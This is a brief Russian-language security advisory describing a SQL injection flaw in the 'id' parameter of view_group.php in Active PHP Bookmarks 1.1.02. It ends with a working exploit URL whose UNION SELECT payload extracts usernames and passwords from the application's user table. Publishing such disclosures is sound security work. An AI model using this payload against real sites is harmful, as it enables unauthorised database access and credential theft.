Программа: Active PHP Bookmarks 1.1.02

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием view_group.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

www.[target].com/Script/view_group.php?id=-1+union+select+1,2, concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users—



Оставить мнение